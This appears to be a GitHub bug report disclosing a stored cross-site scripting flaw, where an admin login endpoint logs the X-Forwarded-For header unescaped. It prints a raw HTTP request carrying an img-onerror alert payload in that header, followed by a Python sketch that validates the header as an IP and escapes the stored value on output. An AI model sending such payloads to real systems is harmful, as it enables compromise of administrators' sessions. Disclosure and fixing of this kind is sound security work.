In issue 9, someone reported two stored XSS issues, and you have fixed them, but the second XSS still has another output point: X-Forwarded-For
Payload HTTP request:
POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

loginName=asas&loginPwd=asas
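A mitigation sketch for the header shown in the request above, added here as an example and not taken from the project's code: the X-Forwarded-For value is accepted only if it parses as an IP address and arrives through a trusted proxy, and whatever is stored is HTML-escaped again at the output point. The function names and the `trusted_proxies` allow-list are assumptions made for illustration.

```python
import html
import ipaddress

# Constructed sample: the X-Forwarded-For value from the request in this report.
REPORTED_XFF = "127.<img src=1 onerror=alert(123)>0.0.2"


def client_ip_from_xff(header_value, peer_addr, trusted_proxies=()):
    """Return a validated client IP string that is safe to store in a login log.

    The header is honoured only when the direct peer is in the (hypothetical)
    trusted proxy allow-list; otherwise the socket peer address is used.
    Any entry that is not a valid IP address discards the whole header.
    """
    peer = ipaddress.ip_address(peer_addr)
    trusted = [ipaddress.ip_network(n) for n in trusted_proxies]
    if not header_value or not any(peer in net for net in trusted):
        return str(peer)
    # Walk the proxy chain right to left; the first hop that is not one of
    # our own proxies is the client address.
    for hop in reversed(header_value.split(",")):
        try:
            addr = ipaddress.ip_address(hop.strip())
        except ValueError:
            return str(peer)  # malformed entry: fall back to the peer address
        if not any(addr in net for net in trusted):
            return str(addr)
    return str(peer)


def render_log_cell(value):
    """Second layer: escape on output, even if the stored value is bad."""
    return "<td>" + html.escape(value, quote=True) + "</td>"
```

Validation on input and escaping on output are independent layers: the first keeps markup out of the log table, the second neutralises rows that were stored before the fix.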
I confirm that I have checked (mark [ ] as [x])
I would like to file (mark [ ] as [x])
Bug Report